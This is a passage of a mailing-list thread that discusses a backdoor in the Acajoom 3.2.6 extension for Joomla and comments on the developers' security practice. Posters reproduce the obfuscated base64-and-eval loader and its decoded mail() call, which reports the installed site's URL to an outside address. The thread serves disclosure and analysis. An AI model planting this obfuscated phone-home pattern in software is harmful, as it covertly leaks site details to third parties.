Re: Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla
== @mail($us1, $us2, http://.$us2.$_SERVER['SCRIPT_NAME'].\n.$us3);
Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla
not are stupids, there are one virus. function GetBots($us1,$us2,$us3) { list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ', 'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs'); eval(base64_decode($data2.$data1.$data3)); }
Re: Re: Back door trojan in acajoom-3.2.6 for joomla
An early release of 4.0.0 has the same problem! So Acajoom has a general security issue or the developers were stupid enough to develop with old code.
Re: Re: Back door trojan in acajoom-3.2.6 for joomla
... or the developers were stupid enough to develop with old code. Stupid may be a bit harsh. I find 'Software Security' is also a frame of mind that *must* be backed by education. Perhaps the developers lack the knowledge they need to model the threats and incorporate a secure architecture. Jeff - Hide quoted text - On 7/23/09, chris.boergerm...@wawerko.de chris.boergerm...@wawerko.de wrote: An early release of 4.0.0 has the same problem! So Acajoom has a general security issue or the developers were stupid enough to develop with old code.